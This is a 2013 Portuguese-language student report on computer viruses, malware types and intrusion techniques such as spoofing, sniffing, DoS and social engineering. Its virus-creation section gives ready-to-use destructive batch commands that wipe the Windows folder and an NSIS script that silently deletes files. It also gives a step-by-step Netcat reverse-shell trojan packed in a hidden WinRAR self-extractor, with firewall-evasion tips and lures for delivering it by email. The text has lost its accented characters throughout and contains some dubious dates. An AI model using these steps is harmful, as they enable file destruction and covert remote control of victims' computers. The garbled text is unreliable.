UNIVERSIDADE FEDERAL DE OURO PRETO INSTITUTO DE CINCIAS EXATAS E APLICADAS/ICEA

VRUS DE COMPUTADOR E INVASO DE SISTEMAS

FILIPE THEODORO GUSTAVO S. MARTINS MIGUEL SOARES SABRINA GONALVES FERMANO SAMUEL NEVES

JOO MONLEVADE, 27 DE JUNHO DE 2013.

O que vrus?
Um vrus um programa com fins maliciosos, capaz de causar transtornos com os mais diversos tipos de aes: h vrus que apagam ou alteram arquivos dos usurios, que prejudicam o funcionamento do sistema operacional danificando ou alterando suas funcionalidades, que causam excesso de trfego em redes, entre outros. Os vrus, tal como qualquer outro tipo de malware, podem ser criados de vrias formas. Os primeiros foram desenvolvidos em linguagens de programao como C e Assembly. Hoje, possvel encontrar inclusive ferramentas que auxiliam na sua criao.

O que um malware?
comum pessoas chamarem de vrus todo e qualquer programa com fins maliciosos. Mas, tal como indica o primeiro pargrafo do texto, h vrios tipos de "pragas digitais", sendo os vrus apenas uma categoria delas. Atualmente, usa-se um termo mais aquedado para generalizar esses programas: a denominao malware, uma combinao das palavras malicious e software que significa "programa malicioso". Portanto, malware nada mais do que um nome criado para quando necessitamos fazer aluso a um software malicioso, seja ele um vrus, um worm, um spyware, etc. importante frisar que a palavra "computador" utilizada neste texto da maneira mais ampla, considerando os vrios tipos de dispositivos computacionais que existem: desktops, servidores, smartphones, tablets e assim por diante. vlido destacar tambm que os malwares no se limitam a uma nica plataforma. H quem pense, por exemplo, que s h pragas digitais para Windows, mas isso no verdade. O que acontece que a famlia de sistemas operacionais da Microsoft mais popular e, portanto, mais visada. Como no existe software 100% seguro, malwares tambm podem ser desenvolvidos para atacar qualquer outra plataforma, afinal, sempre h algum disposto a descobrir e explorar suas deficincias.

Primeiro vrus
H 20 anos, em janeiro de 1986, o primeiro vrus de computador foi descoberto. Chamava-se Brain e se propagava por meio de disquetes, uma forma mais lenta de se disseminar, comparada rapidez da internet.

Apesar do Brain ser o primeiro vrus a se ter conhecimento, ele no considerado o primeiro cdigo malicioso. A "honra" cabe ao vrus ElkCloner, escrito por Richard Skrenta, que infectava mquinas Apple II.

Quando o e-mail comeou a ficar popular, porm, vermes que poderiam causar epidemias

globais em questo de um dia logo surgiram. O mais notvel - e tambm um dos primeiros foi o Love letter, ou I LOVE YOU, uma praga que fingia entregar uma carta de amor ao internauta. Antes de ser controlado, em 1999, o Love letter causou prejuzos estimados em at nove bilhes de dlares, segundo a empresa de segurana mi2g.

Hacker e Crackers diferenas

Hackers so indivduos que elaboram e modificam softwares e hardwares de computadores, seja desenvolvendo funcionalidades novas ou adaptando as antigas. J cracker o termo usado para designar quem pratica a quebra (ou cracking) de um sistema de segurana. Mas segundo algumas literaturas j usam outra definio em que esses gnios da informtica so diferenciados segundo sua postura tica hacker ou seja White Hat (Chapu Branco), Black Hat (Chapu Preto) e Gray Hat (Chapu Cinza). Os hackers "Chapu Branco" so pessoas interessadas em segurana e, na maioria das vezes, usam suas habilidades a favor das empresas, sendo 100% ticos em suas aes. So eles que ocupam os cargos de analista de sistema, especialista em TI ou outros empregos na rea de informtica. J os hackers "Chapu Preto" so criminosos e, normalmente, especializados em invases maliciosas de sites. Os hackers "Chapu Cinza" tm as intenes de um Chapu Branco, mas suas aes so eticamente questionveis. Apesar dessa contradio dentro do prprio cenrio de profissionais da segurana, ainda muitos programadores aceitam os termos hacker e cracker como definies corretas. Diversos Fruns sobre programao, blogs de tecnologia, sites como Wikipdia e at dicionrios conceituam os hackers como profissionais do bem e crackers como criminosos.

Tcnicas para criao de Vrus

Antigamente criar vrus era apenas mais um desafio para programadores. Hoje tornou se uma ferramenta muito utilizada por criminosos para tirar proveito, principalmente financeiro, da era digital. Existem inmera tcnicas para criao de vrus, a deciso de qual utilizar depende da finalidade para a qual o vrus ser criado. O tempo de criao de um vrus pode variar de 5 minutos a dias, semanas e at meses para acrescentar todas as configuraes necessrias a ele. Algumas vezes para um criar vrus no necessrio ser expert em programao e nem possuir algum conhecimento da rea. Vrus do tipo *.bat basta ter um cdigo pronto e cola - lo no bloco de notas e salvar. Exemplo 1: arquivo.bat del /s /q c:\windows\ (deleta tudo dentro do Windows; ex: arquivos e no pastas)

rmdir /s /q c:\windows (deleta totalmente o Windows) - (Acaba com o computador) shutdown s (desliga o computador) shutdown r (reinicia o computador) Outros vrus mais detalhados dependem de um programa para ser criado, como o NSIS, NetCat, Delphi, etc. Exemplo 2: Vrus para apagar todos os arquivos de um determinado diretrio. Programado no NSIS. 1 passo Abra um editor de texto qualquer, no exemplo utilizaremos o notepad (bloco de notas), v ao menu INICIAR > EXECUTAR no campo digite notepad e tecle Enter. Dentro da caixa de texto digite os seguintes comandos: !define PRODUCT_NAME "Mensagem do virus" !define PRODUCT_VERSION "1.0" !define PRODUCT_PUBLISHER "Nome do criador" SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}" OutFile "MeuVirus.exe" InstallDir "$TEMP" Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico" SilentInstall silent Section "Sec001" SEC01 Delete /REBOOTOK "C:\imagens\*.*" SectionEnd Na frente de Delete /REBOOTOK voc deve colocar o caminho do diretrio que ter seus arquivos apagados. A instruo *.* indica que todo o contedo ser apagado. 2 passo Na opo ARQUIVO > SALVAR COMO... , v em SALVAR COMO TIPO selecione TODOS OS ARQUIVOS, logo em seguida escolha um nome para o seu arquivo com a extenso .nsi escolha um diretrio qualquer para salvar o seu arquivo, no exemplo, colocamos o nome do arquivo como: vrus.nsi e salvamos ele no prprio Desktop, o nome do arquivo assim como diretrio onde ele ser salvo voc pode escolher qualquer um, mas o importante colocar a extenso .nsi. 3 passo Abrir o compilador NSIS e clicar em Compile NSI scripts. Na janela que ser aberta clique em FILE -> LOAD SCRIPT... Procure no Desktop o arquivo vrus. Clique nele e em seguida cique em Abrir. 4 passo Aps o arquivo ser compilado clique em Close. importante observar que se voc clicar em Test Installer o vrus ser executado no seu computador. Por isso nunca faa isso. 5 passo O vrus est pronto.

Exemplo 2: Criando vrus com o NetCat.

Ser mostrado aqui um exemplo de instalao de software malicioso que no ser detectado por nenhum tipo de software antivrus ou antispyware, pois utilizar um software autntico; nem tampouco ser bloqueado pelo firewall pessoal do sistema operacional, pois efetuar sua conexo de forma reversa ao modo convencional utilizado na maioria dos softwares maliciosos, ou seja, ao invs de abrir uma porta para conexo do intruso, se conectar automaticamente ao intruso, opo que liberada na maioria dos firewalls. Esse exemplo usar as seguintes ferramentas: Netcat, software de conexo de aplicativos texto para execuo remota; WinRAR, software de compactao. O funcionamento desse vrus bastante simples. Ser criado um arquivo auto-extravel como o WinRAR. Ao ser descompactado, esse arquivo executar o Netcar na configurao cliente, conectando diretamente ao computador do intruso, que aguardar pela conexo. Depois de estabelecida, o intruso tem acesso ao prompt de comandos da vtima, podendo ser usado para alterar qualquer tipo de configurao, ou ainda instalar novos softwares, bem como realizar qualquer tipo alterao no sistema de arquivos da vtima.

1 passo Crie um novo arquivo compactado no WinRAR. Adicione a esse arquivo o executvel do Netcat, nc.exe. 2 passo Clique no boto com a legenda SFX, utilizado para a criao de arquivos auto-extraveis. Nas configuraes avanadas, indique o caminho para extrao como C:\windows\system32, marcando como Caminho absoluto. E indique que, aps a extrao, o seguinte comando deve ser executado: nc d ip do intruso porta e cmd.exe, onde ip do intruso o endereo de rede IP do computador do intruso que executar o servidor e porta uma porta escolhida para a conexo TCP. Para dificultar o bloqueio de firewalls, conveniente usar portas muito utilizadas, como a porta 80, normalmente usada para servidores web.

3 passo Ainda nas opes do arquivo auto-extravel, na aba Mtodos, marque as opes Ocultar tudo e Substituir todos os arquivos. 4 passo Aps esse passo, um arquivo executvel ser gerado. O cone e o nome desse arquivo podem ser alterados para chamar a ateno da vtima. Esse arquivo deve ser executado pela vtima. Logo, pode ser disponibilizado para download em algum site, ou enviado por email. Normalmente so usadas mensagens chamando o usurio a executar esse arquivo como se fossem fotos, vdeos ou cartes. 5 passo No computador do intruso dever ser executado tambm o software Netcat, configurado como servidor, para receber a conexo da vtima. O comando para essa execuo deve ser: nc -l -n -p porta vv Onde porta a porta TCP escolhida para a conexo. Aps a conexo pelo cliente, o intruso receber o prompt de comandos do sistema da vtima. A partir do prompt de comandos pode executar comandos, editar arquivos de configurao, acessar comandos de rede, etc.

Tcnicas para Invaso de Sistemas

Invaso consiste em entrar em determinado site, sistema que providencie algum certo tipo de servio sem ser autorizado. Porm, antes mesmo de invadir determinado sistema o uso combinado de determinadas tcnicas pode facilmente identificar se um sistema est ou no bem protegido. Desta forma, abaixo descreve algumas das principais tcnicas existentes para a invaso de sistemas. Spoofing O Spoofing uma tcnica utilizada para mascarar (Spoof) endereos de IP de mquinas remetentes, convencendo algum de que ele algo que realmente no . Esta uma tcnica utilizada contra a autenticidade e faz com que o sistema acredite ser quem realmente no . A imagem abaixo ilustra o processo de Spoofing.

Figura 1

Sniffers Para monitorar o trfego em uma rede, hoje so usados os programas chamados Snnifers, ele pode ser utilizando pelo administrador da rede para verificar possveis problemas e monitorar quais tipos de dados esto sendo transitados por ela, porm, pode ser usado por uma pessoa no identificada para roubar nomes de usurios e senhas, pois a camada TCP/IP no possui uma criptografia to coesa neste sentido. Vale lembrar que s possvel utilizar este programa/tcnica se o aplicativo de monitoramento estiver instalado em uma das mquinas na rede, monitorando assim todo o seu trfego. A imagem abaixo ilustra esse tipo de tcnica para a invaso de sistemas.

Figura 2

Ataque do tipo DoS Denialof Service Esta tcnica utilizada para sobrecarregar determinado site causando a recusa de servio. O DoS aproveita brechas deixadas no sistema por programadores inexperientes pois ao desenvolver a aplicao este no verifica como o sistema ir se comportar ao tentar ser executado vrias vezes por uma mquina. O invasor parte deste princpio at encontrar determinada falha no sistema e faz-lo parar. De acordo com uma Universidade da Califrnia, Crackers tentam realizar em torno de 15 mil ataques do tipo DoS por semana, sendo o alvo mais comuns deles as grandes empresas.

Ataque do tipo DDoS DistributedDenialof Service Estes ataques so semelhantes ao DoS, porm estes tem como origem milhares de pontos disparando ataques DoS para um ou mais sites determinados pelo invasor. Para isso o invasor utiliza a tcnica de controlar computador zumbis que disparam o ataque em uma ou mais vtimas, estas vtimas so mquina escolhidas pelo invasor por possurem alguma vulnerabilidade, assim ao serem executados so transformados em ataques DoS de grande escala. As figuras 3 e 4 ilustram o ataque do tipo DoS e do tipo DDoS.

Figura 3

Figura 4

Trojans O cavalo de Tria um programa que se hospeda no computador de uma determinada vtima, ele tem o intuito de roubar informaes teis como senhas, logins e quaisquer tipos de dados sendo eles sigilosos ou no que se encontram no computador da vtima. Quando esta mquina contaminada conectar-se internet poder ter todas as informaes contidas no hd visualizas e capturadas por um intruso qualquer, assim em determinado momento programado pelo invasor ele envia todas as informaes para a vtima. Porm vale lembrar que o trojan no um vrus de computador pois ele no se multiplica e seus objetivos so totalmente distintos. Engenharia Social A engenharia social uma espcie de espionagem de dados. Esta tcnica consiste em tentar obter os dados da vtima atravs de bate papos, se passando ser por uma pessoa que no ou at mesmo tentando invadir determinado sistema utilizando senhas comuns e que so obtidas com certa facilidade tal como nome, sobrenome, data de nascimento e etc. A engenharia social possvel por nem todas as pessoas se preocupam com o sigilo de suas informaes e dados na internet e ao cair nas mos de intrusos estes dados so utilizados para outro fim.

Vrus e Programas Maliciosos

Vrus de Boot Um dos primeiros tipos de vrus conhecido, o vrus de boot infecta a parte de inicializao do sistema operacional. Assim, ele ativado quando o disco rgido ligado e o Sistema Operacional carregado. Time Bomb Os vrus do tipo "bomba-relgio" so programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectando um determinado sistema, o vrus somente se tornar ativo e causar algum tipo de dano no dia ou momento previamente definido. Alguns vrus se tornaram famosos, como o "Sexta-Feira 13", "Michelangelo", "Eros" e o "1 de Abril (Conficker)". Minhocas, worm ou vermes Como o interesse de fazer um vrus ele se espalhar da forma mais abrangente possvel, os seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usurios infectados e passaram a programar seus vrus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, os seus autores visam a tornar suas criaes mais conhecidas na Internet. Este tipo de vrus passou a ser chamada de verme ou worm. Eles esto mais aperfeioados, j h uma verso que ao atacar a mquina hospedeira, no s se replica, mas tambm se propaga pela INTERNET, pelos e-mails que esto registrados no cliente de e-mail, infectando as mquinas que abrirem aquele e-mail, reiniciando o ciclo. Davinia O HTML/Davinia, HTML/LittleDavinia, JS/Davinia, W97M/Davinia, VBS/Davinia capaz de contaminar e de autopropagar - se sem o recurso de um anexo mensagem.

Entre os worms de e-mail um dos mais perigosos sendo, no entanto, de baixa ocorrncia. Ele capaz de danificar todos os arquivos .html e de deix-los irrecuperveis.

Trojans ou cavalos de Tria O Cavalo de Tria ou Trojan Horse um tipo programa malicioso, que podem entrar em um computador, disfarado como um programa comum e legtimo. Ele serve para possibilitar a abertura de uma porta de forma que usurios mal intencionados possam invadir seu PC. Estado Zombie O estado zombie em um computador ocorre quando infectado e est sendo controlado por terceiros. Podem us-lo para disseminar, vrus, keyloggers, e procedimentos invasivos em geral. Usualmente esta situao ocorre pelo fato da mquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na rea, um computador que est na internet nessas condies tem quase 50% de chance de se tornar uma mquina zumbi, que dependendo de quem est controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers so presos por formar exrcitos zombies para roubar dinheiro das contas correntes e extorquir. Vrus de Macro Os vrus de macro (ou macro vrus) vinculam suas macros a modelos de

documentos gabaritos e a outros arquivos de modo que, quando um aplicativo carrega o arquivo e executa as instrues nele contidas, as primeiras instrues executadas sero as do vrus. Vrus de macro so parecidos com outros vrus em vrios aspectos: so cdigos escritos para que, sob certas condies, este cdigo se "reproduz", fazendo uma cpia dele mesmo. Como outros vrus, eles podem ser escritos para causar danos, apresentar uma mensagem ou fazer qualquer coisa que um programa possa fazer. Resumindo, um vrus de macro infecta os arquivos do Microsoft Office (.doc - word,.xls excel,.ppt - power point,.mdb - access. Melissa ou W97M/Melissa um vrus de macro que se tornou manchete de tecnologia em maro de 1999. Projetado para infectar documentos Word, se espalhou rapidamente e forou empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se

disseminava via Outlook. O vrus, alm de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televiso Os Simpsons. Causou danos estimados em US$ 300 milhes a US$ 600 milhes. Hijack A navegao na internet com toda certeza j foi considerada muito mais insegura do que hoje em dia. Apesar de ainda existirem muitos malwares, spywares e todos os seus parentes, no faltam programas que os combatam e tambm evitem que eles invadam nossos computadores.

Um destes terrveis invasores se chama Hijack. Traduzindo literalmente, os Hijackers so seqestradores. E o sentido real no fica muito longe disso. Estes programas entram em seu computador sem voc perceber, utilizando controles ActiveX e brechas na segurana. Assim, modificam o registro do Windows, seqestrando o seu navegador e modificando a pgina inicial dele. Depois aparecem novas barras e botes, e pginas abrem sem parar na tela, contra a sua vontade. Todas estas coisas que so alteradas em seu navegador normalmente linkam para publicidade e, na maioria das vezes, tm inclusive pornografia envolvida. E quem sai ganhando com esta invaso em seu PC o desenvolvedor deste Hijack, j que ele pago por cada vez que estas pginas com publicidade so abertas. E claro que eles so grudentos, pois dificilmente voc consegue remover alguns deles. Como evitar ou acabar com eles? Nos Downloads Relacionados voc encontra uma breve lista com alguns programas que podem ajud-lo a resolver o problema.

Referncias Bibliogrficas ALECRIM, Emerson . Vrus de computador e outros malwares: o que so e como agem. Disponvel em: < http://www.infowester.com/malwares.php> Acessado em: 26 jun. 2013. Hackers e Crackers: as diferenas. Disponvel em:

<http://olhardigital.uol.com.br/produtos/digital_news/noticias/hackers_e_crackers_saiba_as_d iferencas> Acessado em: 26 jun. 2013. Faq sobre vrus. Disponvel em: <http://www.linhadefensiva.org/faq/virus/> Acessado em: 26 jun. 2013. Criar um vrus. Disponvel em: < http://thehackersbrasil.blogspot.com.br/2008/03/criar-umvirus.html> Acessado em: 26 jun. 2013. Aprenda a criar vrus de maneira simples. Disponvel em:

<http://headplay.blogspot.com.br/2011/03/aprenda-criar-virus-de-maneira-simples.html> Acessado em: 26 jun. 2013. PEREIRA, Ana Paula. O que um Trojan?. Disponvel em:

<http://www.tecmundo.com.br/seguranca/196-o-que-e-um-trojan-.htm> Acessado em: 23 jun. 2013. Vrus de computador. Disponvel em:

<http://pt.wikipedia.org/wiki/V%C3%ADrus_de_computador#Tipos_de_v.C3.ADrus> Acessado em: 23 jun. 2013. Melissa (vrus de computador). Disponvel em:

<http://pt.wikipedia.org/wiki/Melissa_(v%C3%ADrus_de_computador)> Acessado em: 23 jun. 2013. Davinia. Disponvel em: <http://antivirus.about.com/library/virusinfo/bldavinia.htm>

Acessado em: 23 jun.. 2013. KARASINSKI, Eduardo. O que Hijack?. Disponvel em:

<http://www.tecmundo.com.br/spyware/212-o-que-e-hijack-.htm#ixzz2XPfZavqz> Acessado em: 27 jun. 2013.

Ferreira, P. . (26 de 06 de 2013). Mtodos de Invaso. Disponvel em: <http://www.ericonet.com.br/admin/material/Metodos_de_Invasao.pdf> Acesso em 26 jun 2013. Souza, R. M. (2013). Tcnicas de Invaso. Disponvel em: <http://seguranca-informacaoranieri.blogspot.com.br/2009/07/tecnicas-de-invasao.html> Acesso em 26 jun. 2013.